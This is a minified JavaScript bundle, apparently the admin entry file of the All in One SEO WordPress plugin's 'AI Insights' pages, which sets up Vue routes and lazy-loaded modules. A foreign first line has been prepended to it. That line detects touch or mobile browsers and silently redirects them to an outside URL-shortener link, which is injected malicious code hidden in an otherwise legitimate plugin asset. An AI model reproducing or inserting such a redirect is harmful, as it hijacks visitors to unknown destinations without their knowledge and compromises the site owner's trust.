(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/AiContent.e70d9678.js"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/BuyOrConnectButtons.3092c34b.js"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/CreditCounter.fbbb453f.js"),window.__aioseoDynamicImportPreload__("js/Tooltip.569a23d9.js"),window.__aioseoDynamicImportPreload__("css/Tooltip.497e84ea.css"),window.__aioseoDynamicImportPreload__("js/Trash.47f6fc0e.js"),window.__aioseoDynamicImportPreload__("css/CreditCounter.a4fc59dc.css"),window.__aioseoDynamicImportPreload__("js/Index.6933f196.js"),window.__aioseoDynamicImportPreload__("css/Index.2bdb640f.css"),window.__aioseoDynamicImportPreload__("css/BuyOrConnectButtons.101b76bf.css"),window.__aioseoDynamicImportPreload__("js/SettingsRow.7bec777f.js"),window.__aioseoDynamicImportPreload__("js/Row.2ef96b1a.js"),window.__aioseoDynamicImportPreload__("css/Row.6ff38a54.css"),window.__aioseoDynamicImportPreload__("css/SettingsRow.72ea3c79.css"),window.__aioseoDynamicImportPreload__("js/Cta.8b8e6c45.js"),window.__aioseoDynamicImportPreload__("js/Index.e286637f.js"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("css/Index.859c37d3.css"),window.__aioseoDynamicImportPreload__("css/Cta.541a4715.css"),window.__aioseoDynamicImportPreload__("js/Blur.dea2904a.js"),window.__aioseoDynamicImportPreload__("css/Blur.c6074772.css"),window.__aioseoDynamicImportPreload__("js/Card.9ee06a3e.js"),window.__aioseoDynamicImportPreload__("js/Caret.aae02d8a.js"),window.__aioseoDynamicImportPreload__("js/Slide.f2114d9d.js"),window.__aioseoDynamicImportPreload__("css/Card.8b7603da.css"),window.__aioseoDynamicImportPreload__("css/AiContent.b2e4615b.css"),window.__aioseoDynamicImportPreload__("js/BrandTracker.286e97eb.js"),window.__aioseoDynamicImportPreload__("css/BrandTracker.3c0deb30.css"),window.__aioseoDynamicImportPreload__("js/Main.b8734f65.js"),window.__aioseoDynamicImportPreload__("js/vendor-phone.2afdf77e.js"),window.__aioseoDynamicImportPreload__("css/vendor-phone.bcf692fa.css"),window.__aioseoDynamicImportPreload__("js/Index.66db1786.js"),window.__aioseoDynamicImportPreload__("js/Tabs.ea329423.js"),window.__aioseoDynamicImportPreload__("js/ProBadge.7b829f47.js"),window.__aioseoDynamicImportPreload__("css/ProBadge.6500bcec.css"),window.__aioseoDynamicImportPreload__("js/Information.6ccba108.js"),window.__aioseoDynamicImportPreload__("css/Tabs.d9e8b805.css"),window.__aioseoDynamicImportPreload__("js/Header.d2cbe877.js"),window.__aioseoDynamicImportPreload__("js/ScrollAndHighlight.5271fbff.js"),window.__aioseoDynamicImportPreload__("js/ScrollTo.f4df02aa.js"),window.__aioseoDynamicImportPreload__("js/LicenseKeyBar.0038e5e6.js"),window.__aioseoDynamicImportPreload__("js/LogoGear.93a225a7.js"),window.__aioseoDynamicImportPreload__("css/LicenseKeyBar.1c15fc37.css"),window.__aioseoDynamicImportPreload__("js/AnimatedNumber.f33b2226.js"),window.__aioseoDynamicImportPreload__("js/Logo.a4a419c3.js"),window.__aioseoDynamicImportPreload__("css/Header.e8442b6b.css"),window.__aioseoDynamicImportPreload__("js/Support.d3586703.js"),window.__aioseoDynamicImportPreload__("js/Url.535116f6.js"),window.__aioseoDynamicImportPreload__("js/Exclamation.179e5969.js"),window.__aioseoDynamicImportPreload__("js/Gear.1a6546a3.js"),window.__aioseoDynamicImportPreload__("css/Index.b249bc29.css"),window.__aioseoDynamicImportPreload__("css/main.7ed77203.css"),window.__aioseoDynamicImportPreload__("js/Mcp.18177c0b.js"),window.__aioseoDynamicImportPreload__("js/vendor-prism-editor.fa0057cb.js"),window.__aioseoDynamicImportPreload__("css/Mcp.17b67b06.css")])))=>i.map(i=>d[i]);
import{aq as p,f as m,i as c,a0 as _,an as u}from"./js/vendor-vue-ui.232c7c36.js";import{l}from"./js/index.98d01501.js";import{l as d}from"./js/index.2a5d16ad.js";import{l as f}from"./js/index.0d80c2c2.js";import{l as v}from"./js/app-core.c8323d51.js";import{_ as h}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{_ as g,s as w}from"./js/dynamic-import-helper.c518af60.js";import{_ as o}from"./js/vendor-phone.2afdf77e.js";import{_ as e}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const y={},A={class:"aioseo-app"};function k(s,b){const i=p("router-view");return m(),c("div",A,[_(i)])}const P=h(y,[["render",k]]),n="all-in-one-seo-pack",a=s=>()=>g(Object.assign({"../views/AiContent.vue":()=>o(()=>import("./js/AiContent.e70d9678.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]),import.meta.url),"../views/BrandTracker.vue":()=>o(()=>import("./js/BrandTracker.286e97eb.js"),__vite__mapDeps([37,2,3,4,10,11,8,12,32,1,5,14,15,33,16,34,35,22,23,38]),import.meta.url),"../views/Main.vue":()=>o(()=>import("./js/Main.b8734f65.js"),__vite__mapDeps([39,40,2,3,4,41,42,1,5,43,7,8,9,44,45,33,46,34,47,10,11,12,48,49,50,51,52,53,54,55,16,56,57,58,27,59,60,61,62]),import.meta.url),"../views/Mcp.vue":()=>o(()=>import("./js/Mcp.18177c0b.js"),__vite__mapDeps([63,2,3,4,1,5,7,8,9,32,14,15,33,16,11,34,35,64,27,59,65]),import.meta.url)}),`../views/${s}.vue`,3),E=[{path:"/:pathMatch(.*)*",redirect:"/keyword-reports"},{path:"/keyword-reports/:uuid?",name:"keyword-reports",component:a("Main"),meta:{access:"aioseo_ai_insights_settings",name:e("Keyword Reports",n),showSaveButton:!1,label:"beta"}},{path:"/brand-tracker",name:"brand-tracker",component:a("Main"),meta:{access:"aioseo_ai_insights_settings",name:e("Brand Tracker",n),showSaveButton:!1,label:"coming-soon"}},{path:"/ai-content",name:"ai-content",component:a("Main"),meta:{access:"aioseo_ai_insights_settings",name:e("AI Content",n),showSaveButton:!0}},{path:"/mcp",name:"mcp",component:a("Main"),meta:{access:"aioseo_ai_insights_settings",name:e("MCP",n),showSaveButton:!1,label:"new"}}];let t=u({...P,name:"Pages/AiInsights"});t=l(t);t=d(t);t=f(t);const r=w(E,t);r.app=t;t.use(r);v(t,r);t.mount("#aioseo-app");
